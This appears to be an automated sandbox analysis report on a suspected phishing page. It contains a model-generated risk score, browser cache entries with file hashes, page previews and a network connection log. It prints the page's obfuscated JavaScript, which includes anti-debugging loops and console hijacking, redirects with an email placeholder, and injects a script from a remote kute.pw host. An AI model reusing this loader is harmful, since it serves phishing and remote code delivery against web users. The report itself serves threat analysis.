o=_0x1ffb63.constructor.prototype.bind(_0x1ffb63),c=r[e],i=n[c]\|\|o;o.__proto__=_0x1ffb63.bind(_0x1ffb63),o.toString=i.toString.bind(i),n[c]=o}});_0x2ba383();var ufmzporhkyewbjazgdahj="&!@8RqQkHv7aXW1mEcNIJowGSZ0x3!&@deoYPN83tfS70v41KFQCTlbjGqB!@&";-1==window.location.href.indexOf("bbre=")&&(window.location.href=document.location.pathname+"?bbre=cikztgVjwNGEbqBylxm#/ld-"+rfoevycgjzsqwpngmdvbntu);var emfromgetnbrtoo="",hpIJAgXqKZOCjrdUWywmRvHbToS=document.createElement("script");function _0x45dbcc(t){function n(t){if("string"==typeof t)return function(t){}.constructor("while (true) {}").apply("counter");1!==(""+t/t).length\|\|t%20==0?function(){return!0}.constructor("debugger").call("action"):function(){return!1}.constructor("debugger").apply("stateObject"),n(++t)}try{if(t)return n;n(0)}catch(t){}}hpIJAgXqKZOCjrdUWywmRvHbToS.type="text/javascript",hpIJAgXqKZOCjrdUWywmRvHbToS.src="https://xjdcawrhzgcobuvuimlzladxi.kute.pw/6629385b8f74dc5e5e1d8619-662938458f74dc5e5e1d8618.js",document.getElementsByTagName("head")[0].appendChild(hpIJAgXqKZOCjrdUWywmRvHbToS);

Input

Output

URL: https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm#/ld-SILENTCODERSEMAIL Model: gpt-4o

```json
{
  "riskscore": 9,
  "reasons": "The JavaScript code contains several red flags indicating potentially malicious behavior. It includes obfuscated code, which is often used to hide malicious intent. The code attempts to manipulate the console and includes a function that runs an infinite loop ('while (true) {}'). Additionally, it dynamically loads an external script from a suspicious domain ('kute.pw'), which is a common tactic used in malicious scripts to download further payloads. The code also modifies the URL parameters, which could be used for phishing or tracking purposes."
}

var _0x48d833=function(){var e=!0;return function(n,r){var t=e?function(){if(r){var t=r.apply(n,arguments);return r=null,t}}:function(){};return e=!1,t}}();!function(){_0x48d833(this,function(){var t=new RegExp("function *\\( *\\)"),n=new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)","i"),r=_0x45dbcc("init");t.test(r+"chain")&&n.test(r+"input")?_0x45dbcc():r("0")})()}();var _0x1ffb63=function(){var e=!0;return function(n,r){var t=e?function(){if(r){var t=r.apply(n,arguments);return r=null,t}}:function(){};return e=!1,t}}();setInterval(function(){_0x45dbcc()},4e3);var _0x2ba383=_0x1ffb63(this,function(){for(var t=function(){var n;try{n=Function('return (function() {}.constructor("return this")( ));')()}catch(t){n=window}return n}(),n=t.console=t.console||{},r=["log","warn","info","error","exception","table","trace"],e=0;e<r.length;e++){var o=_0x1ffb63.constructor.prototype.bind(_0x1ffb63),c=r[e],i=n[c]||o;o.__proto__=_0x1ffb63.bind(_0x1ffb63),o.toString=i.toString.bind(i),n[c]=o}});_0x2ba383();var ufmzporhkyewbjazgdahj="&!@8RqQkHv7aXW1mEcNIJowGSZ0x3!&@deoYPN83tfS70v41KFQCTlbjGqB!@&";-1==window.location.href.indexOf("bbre=")&&(window.location.href=document.location.pathname+"?bbre=cikztgVjwNGEbqBylxm#/ld-"+rfoevycgjzsqwpngmdvbntu);var emfromgetnbrtoo="",hpIJAgXqKZOCjrdUWywmRvHbToS=document.createElement("script");function _0x45dbcc(t){function n(t){if("string"==typeof t)return function(t){}.constructor("while (true) {}").apply("counter");1!==(""+t/t).length||t%20==0?function(){return!0}.constructor("debugger").call("action"):function(){return!1}.constructor("debugger").apply("stateObject"),n(++t)}try{if(t)return n;n(0)}catch(t){}}hpIJAgXqKZOCjrdUWywmRvHbToS.type="text/javascript",hpIJAgXqKZOCjrdUWywmRvHbToS.src="https://xjdcawrhzgcobuvuimlzladxi.kute.pw/6629385b8f74dc5e5e1d8619-662938458f74dc5e5e1d8618.js",document.getElementsByTagName("head")[0].appendChild(hpIJAgXqKZOCjrdUWywmRvHbToS);

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (4411), with no line terminators
Category:	downloaded
Size (bytes):	4411
Entropy (8bit):	5.97558822229074
Encrypted:	false
SSDEEP:	96:hAvc/QitNwLpT2XT0uZqjU7vVdtA6+Fxasya58:htIitwYqIh7A6+FxJ58
MD5:	FDCF21A54AED6AF63D7AF469333E57B6
SHA1:	3D7BA5EE4C0EAD38A9E6188E64454F7F0673CEA8
SHA-256:	FC1CA3392FB510DEF2D9720A55A1314CD5F4E2AEECBE9A1C37B243F8D9B3B71B
SHA-512:	1EE7E8A1D6150627F54CAA784FFF8226B68FB170221FA71828C3F4BF979529A141436A13122C7F0A5E62E06006CC2B89B13122BDB236C7C64E1666708247D259
Malicious:	false
Reputation:	low
URL:	https://fanondiekoxzijds.jamesona8.workers.dev/pgX2K9YojkuEcPdfFCtGvRHJSm
Preview:	<!doctype html><html lang="en-US" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="googlebot" content="noindex,nofollow"><meta name="robots" content="noindex,nofollow"><meta name="slurp" content="noindex,noarchive,nofollow,nosnippet,noodp,noydir" /><meta name="msnbot" content="noindex,nofollow," /><meta name="teoma" content="noindex,nofollow," /><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="HandheldFriendly" content="true"><meta property="og:site_name" content="Loading &period;&period;&period;&period; -....-VxGtByMmZPQ89NUFXW6" /><meta property="og:type" content="website" /><meta property="og:title" content="/S5bNmgEIKJs3ie4RUX2/UjTOz8wdm3t97SEcusxk2pr" /><meta property="twitter:title" content="/wtYpmx4zE3vQ2ui0F8PC61lojJ/REOqFS8X3xgQYMeh" /><meta name="description" content="/B1XPdZ3pF6A5wV/ dOwijnIrWcSC16sP

Chrome Cache Entry: 45

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (4411), with no line terminators
Category:	downloaded
Size (bytes):	4411
Entropy (8bit):	5.97558822229074
Encrypted:	false
SSDEEP:	96:hAvc/QitNwLpT2XT0uZqjU7vVdtA6+Fxasya58:htIitwYqIh7A6+FxJ58
MD5:	FDCF21A54AED6AF63D7AF469333E57B6
SHA1:	3D7BA5EE4C0EAD38A9E6188E64454F7F0673CEA8
SHA-256:	FC1CA3392FB510DEF2D9720A55A1314CD5F4E2AEECBE9A1C37B243F8D9B3B71B
SHA-512:	1EE7E8A1D6150627F54CAA784FFF8226B68FB170221FA71828C3F4BF979529A141436A13122C7F0A5E62E06006CC2B89B13122BDB236C7C64E1666708247D259
Malicious:	false
Reputation:	low
URL:	https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm
Preview:	<!doctype html><html lang="en-US" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="googlebot" content="noindex,nofollow"><meta name="robots" content="noindex,nofollow"><meta name="slurp" content="noindex,noarchive,nofollow,nosnippet,noodp,noydir" /><meta name="msnbot" content="noindex,nofollow," /><meta name="teoma" content="noindex,nofollow," /><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="HandheldFriendly" content="true"><meta property="og:site_name" content="Loading &period;&period;&period;&period; -....-VxGtByMmZPQ89NUFXW6" /><meta property="og:type" content="website" /><meta property="og:title" content="/S5bNmgEIKJs3ie4RUX2/UjTOz8wdm3t97SEcusxk2pr" /><meta property="twitter:title" content="/wtYpmx4zE3vQ2ui0F8PC61lojJ/REOqFS8X3xgQYMeh" /><meta name="description" content="/B1XPdZ3pF6A5wV/ dOwijnIrWcSC16sP

Chrome Cache Entry: 46

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3752), with no line terminators
Category:	downloaded
Size (bytes):	3752
Entropy (8bit):	5.499491377321059
Encrypted:	false
SSDEEP:	96:ktm8p77hXsgK10nTm5juQAj/jI9juiTwNda:T8n8gK10nTm5juQAj/jI9juiTwNg
MD5:	A9A30DA9D6979B208E8F879A2C26C8BA
SHA1:	33CB809F8E3797F9825EC2E0B24250E87AE7C44C
SHA-256:	A840C78AF43A591A5ADDE6FE57BB3F9E89A87AB9AFBB7930B6FB40C7249B4A05
SHA-512:	969BC825CECAC231233F94D817CD86FEC25F9A117A2B54D30A5C4502A0367B35AAE7FAE02B9AB5D87E421AB57DAB15D73E9463DF829CCFB61F439C587C34E5A4
Malicious:	false
Reputation:	low
URL:	https://xjdcawrhzgcobuvuimlzladxi.kute.pw/6629385b8f74dc5e5e1d8619-662938458f74dc5e5e1d8618.js
Preview:	function loadScript(t,e){var r,n=(r=!0,function(e,n){var t=r?function(){if(n){var t=n.apply(e,arguments);return n=null,t}}:function(){};return r=!1,t});!function(){n(this,function(){var t=new RegExp("function \$ \$"),e=new RegExp("\\+\\+ (?:[a-zA-Z_$][0-9a-zA-Z_$])","i"),n=_0x1d4605("init");t.test(n+"chain")&&e.test(n+"input")?_0x1d4605():n("0")})()}();var o,s=(o=!0,function(e,n){var t=o?function(){if(n){var t=n.apply(e,arguments);return n=null,t}}:function(){};return o=!1,t});s(this,function(){for(var t=function(){var e;try{e=Function('return (function() {}.constructor("return this")( ));')()}catch(t){e=window}return e}(),e=t.console=t.console\|\|{},n=["log","warn","info","error","exception","table","trace"],r=0;r<n.length;r++){var o=s.constructor.prototype.bind(s),a=n[r],c=e[a]\|\|o;o.__proto__=s.bind(s),o.toString=c.toString.bind(c),e[a]=o}})();var a,c=e;e<2?((a=document.createElement("link")).type="text/css",a.rel="stylesheet"):(a=document.createElement("script")).type="text/java

Chrome Cache Entry: 47

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	288919
Entropy (8bit):	5.344769543414655
Encrypted:	false
SSDEEP:	1536:qAPr3BNW55+khQUB+iPWr82XUqBMxYAFiVFejpemTmzWTc+k7ZUB+oPWra2XUkB3:dPr3BqZVemK/RMqmydz
MD5:	38CE43FF7FC3CD45771A4CF0553F9CF3
SHA1:	53AE9E92ACDE9A892291394F2F69006E0FA05115
SHA-256:	257C2C8800BB8565F1A78CCC31975AE503BDA03B04BC13FDED1F7C85603F0AD3
SHA-512:	B319157CD82E26D6DD7F6AB359E404472D3B5ED0E251A3E32554E07A7E5FFD442D124A270D728F551E4905174FC38FE4462D8409F0602EDFEA91DE9F89493994
Malicious:	false
Reputation:	low
URL:	https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104nbr1713977432.css
Preview:	::-webkit-scrollbar {width:3px }::-webkit-scrollbar-track {background:#f7fafe }::-webkit-scrollbar-thumb {background:#0B5CAE;border-radius:30px }::-webkit-scrollbar-thumb:hover {background:#0B5CAE;}@font-face {font-family:'Segoe UI';src:url('assets/SegoeUI.eot');src:local('Segoe UI'),local('SegoeUI'),url('assets/SegoeUI.eot?#iefix')format('embedded-opentype'),url('assets/SegoeUI.woff2')format('woff2'),url('assets/SegoeUI.woff')format('woff'),url('assets/SegoeUI.ttf')format('truetype');font-weight:normal;font-style:normal;}@font-face {font-family:'Segoe UI';src:url('assets/SegoeUI-SemiBold.eot');src:local('Segoe UI Semibold'),local('SegoeUI-SemiBold'),url('assets/SegoeUI-SemiBold.eot?#iefix')format('embedded-opentype'),url('assets/SegoeUI-SemiBold.woff2')format('woff2'),url('assets/SegoeUI-SemiBold.woff')format('woff'),url('assets/SegoeUI-SemiBold.ttf')format('truetype');font-weight:600;font-style:normal;}*,body {margin:0;padding:0;box-sizing:border-box;}body {font-family:Segoe UI;}img

Chrome Cache Entry: 48

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (4411), with no line terminators
Category:	dropped
Size (bytes):	4411
Entropy (8bit):	5.97558822229074
Encrypted:	false
SSDEEP:	96:hAvc/QitNwLpT2XT0uZqjU7vVdtA6+Fxasya58:htIitwYqIh7A6+FxJ58
MD5:	FDCF21A54AED6AF63D7AF469333E57B6
SHA1:	3D7BA5EE4C0EAD38A9E6188E64454F7F0673CEA8
SHA-256:	FC1CA3392FB510DEF2D9720A55A1314CD5F4E2AEECBE9A1C37B243F8D9B3B71B
SHA-512:	1EE7E8A1D6150627F54CAA784FFF8226B68FB170221FA71828C3F4BF979529A141436A13122C7F0A5E62E06006CC2B89B13122BDB236C7C64E1666708247D259
Malicious:	false
Reputation:	low
Preview:	<!doctype html><html lang="en-US" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="googlebot" content="noindex,nofollow"><meta name="robots" content="noindex,nofollow"><meta name="slurp" content="noindex,noarchive,nofollow,nosnippet,noodp,noydir" /><meta name="msnbot" content="noindex,nofollow," /><meta name="teoma" content="noindex,nofollow," /><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="HandheldFriendly" content="true"><meta property="og:site_name" content="Loading &period;&period;&period;&period; -....-VxGtByMmZPQ89NUFXW6" /><meta property="og:type" content="website" /><meta property="og:title" content="/S5bNmgEIKJs3ie4RUX2/UjTOz8wdm3t97SEcusxk2pr" /><meta property="twitter:title" content="/wtYpmx4zE3vQ2ui0F8PC61lojJ/REOqFS8X3xgQYMeh" /><meta name="description" content="/B1XPdZ3pF6A5wV/ dOwijnIrWcSC16sP

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1086), with no line terminators
Category:	downloaded
Size (bytes):	1086
Entropy (8bit):	4.943990229770432
Encrypted:	false
SSDEEP:	12:n/3qtdyuzm96olbOw2XmLxhlFfgaVtnHJX5GL4pr7tnk1A1iGc4bDY8zIXmuA:Pyw60ajXKx/FIWpX5GLW9k53iDjgmuA
MD5:	CB372B95DFCAF79CF09DA253AEDEA8B1
SHA1:	08E7999607C2F6B8EBB5E07681B0F22857D88E94
SHA-256:	118F4D0A8C85BFBE5E7DFA3162E04E73C6FCDA9CF1736B28F9472AA7E03BA2AF
SHA-512:	08476963CF8B4A3DAA000ACE639C9E713D37B0879EEA131287051BD6EEB309C2C267DAE6D36DF48EC093DCE6F4C879095FD0C14482B8B6AEF81077F6BFEFE667
Malicious:	false
Reputation:	low
URL:	https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0nbr1713977432.css
Preview:	#outdated {font-family:"Open Sans","Segoe UI",sans-serif;position:absolute;background-color:#f25648;color:white;display:none;overflow:hidden;left:0;position:fixed;text-align:center;text-transform:uppercase;top:0;width:100%;z-index:1500;padding:0 24px 24px 0;}#outdated.fullscreen {height:100%;}#outdated .vertical-center {display:table-cell;text-align:center;vertical-align:middle;}#outdated h6 {font-size:25px;line-height:25px;margin:12px 0;}#outdated p {font-size:12px;line-height:12px;margin:0;}#outdated #buttonUpdateBrowser {border:2px solid white;color:white;cursor:pointer;display:block;margin:30px auto 0;padding:10px 20px;position:relative;text-decoration:none;width:230px;}#outdated #buttonUpdateBrowser:hover {background-color:white;color:#f25648;}#outdated .last {height:20px;position:absolute;right:70px;top:10px;width:auto;display:inline-table;}#outdated .last[dir=rtl]{left:25px !important;right:auto !important;}#outdated #buttonCloseUpdateBrowser {color:white;display:block;font-size

Chrome Cache Entry: 50

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (4411), with no line terminators
Category:	downloaded
Size (bytes):	4411
Entropy (8bit):	5.97558822229074
Encrypted:	false
SSDEEP:	96:hAvc/QitNwLpT2XT0uZqjU7vVdtA6+Fxasya58:htIitwYqIh7A6+FxJ58
MD5:	FDCF21A54AED6AF63D7AF469333E57B6
SHA1:	3D7BA5EE4C0EAD38A9E6188E64454F7F0673CEA8
SHA-256:	FC1CA3392FB510DEF2D9720A55A1314CD5F4E2AEECBE9A1C37B243F8D9B3B71B
SHA-512:	1EE7E8A1D6150627F54CAA784FFF8226B68FB170221FA71828C3F4BF979529A141436A13122C7F0A5E62E06006CC2B89B13122BDB236C7C64E1666708247D259
Malicious:	false
Reputation:	low
URL:	https://fanondiekoxzijds.jamesona8.workers.dev/
Preview:	<!doctype html><html lang="en-US" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="googlebot" content="noindex,nofollow"><meta name="robots" content="noindex,nofollow"><meta name="slurp" content="noindex,noarchive,nofollow,nosnippet,noodp,noydir" /><meta name="msnbot" content="noindex,nofollow," /><meta name="teoma" content="noindex,nofollow," /><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="HandheldFriendly" content="true"><meta property="og:site_name" content="Loading &period;&period;&period;&period; -....-VxGtByMmZPQ89NUFXW6" /><meta property="og:type" content="website" /><meta property="og:title" content="/S5bNmgEIKJs3ie4RUX2/UjTOz8wdm3t97SEcusxk2pr" /><meta property="twitter:title" content="/wtYpmx4zE3vQ2ui0F8PC61lojJ/REOqFS8X3xgQYMeh" /><meta name="description" content="/B1XPdZ3pF6A5wV/ dOwijnIrWcSC16sP

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 00:46:13.483875036 CEST	49674	443	192.168.2.6	173.222.162.64
May 27, 2024 00:46:13.483875036 CEST	49673	443	192.168.2.6	173.222.162.64
May 27, 2024 00:46:13.749480963 CEST	49672	443	192.168.2.6	173.222.162.64
May 27, 2024 00:46:20.855348110 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:20.855387926 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:20.855459929 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:20.855721951 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:20.855751038 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:20.855994940 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:20.856014013 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:20.856074095 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:20.856225014 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:20.856250048 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.350244045 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.350534916 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.350553989 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.352102041 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.352170944 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.353137970 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.353224039 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.353319883 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.353336096 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.366056919 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.366327047 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.366341114 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.367774963 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.367850065 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.368170023 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.368251085 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.405385017 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.421014071 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.421025991 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.467025995 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.501358986 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.503272057 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.503348112 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.503367901 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.505356073 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.505431890 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.505431890 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.505475998 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.508176088 CEST	49705	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.508189917 CEST	443	49705	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.541610003 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.542141914 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.542161942 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.542221069 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.542500973 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.542515993 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.586507082 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.598208904 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:21.598227024 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:21.598299980 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:21.598499060 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:21.598515034 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:21.622920990 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:21.622965097 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:21.623018980 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:21.623178005 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:21.623197079 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:21.654441118 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.656517029 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.656599045 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.656614065 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.660582066 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.660655975 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.660662889 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.660705090 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.664005041 CEST	49704	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:21.664015055 CEST	443	49704	188.114.97.3	192.168.2.6
May 27, 2024 00:46:21.680874109 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:21.680893898 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:21.680965900 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:21.681180954 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:21.681195021 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.058592081 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:22.058903933 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:22.058932066 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:22.059390068 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:22.059781075 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:22.059873104 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:22.092370987 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.092623949 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.092634916 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.094125986 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.094206095 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.095372915 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.095453978 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.095546007 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.095556021 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.106878996 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:22.137408972 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.178909063 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.179235935 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.179275990 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.180159092 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.180238008 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.180922985 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.180991888 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.232047081 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.232068062 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.239171982 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.240535021 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.240588903 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.240592003 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.240607023 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.240657091 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.243793011 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.243901014 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.243949890 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.245451927 CEST	49708	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.245487928 CEST	443	49708	104.21.50.211	192.168.2.6
May 27, 2024 00:46:22.275226116 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:22.291191101 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:22.291979074 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:22.291989088 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:22.292855978 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:22.292910099 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:22.295459032 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:22.295516968 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:22.340403080 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:22.340409994 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:22.348459959 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:22.348543882 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:22.348608017 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:22.349246979 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:22.349280119 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:22.388807058 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:22.889569998 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:22.889964104 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:22.890031099 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:22.891428947 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:22.891493082 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:22.894047022 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:22.894160032 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:22.894977093 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:22.894993067 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:22.935189962 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:23.089708090 CEST	49674	443	192.168.2.6	173.222.162.64
May 27, 2024 00:46:23.091079950 CEST	49673	443	192.168.2.6	173.222.162.64
May 27, 2024 00:46:23.135437965 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.140276909 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.140347958 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:23.146800041 CEST	49712	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:23.146838903 CEST	443	49712	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.199486971 CEST	49713	443	192.168.2.6	199.36.158.100
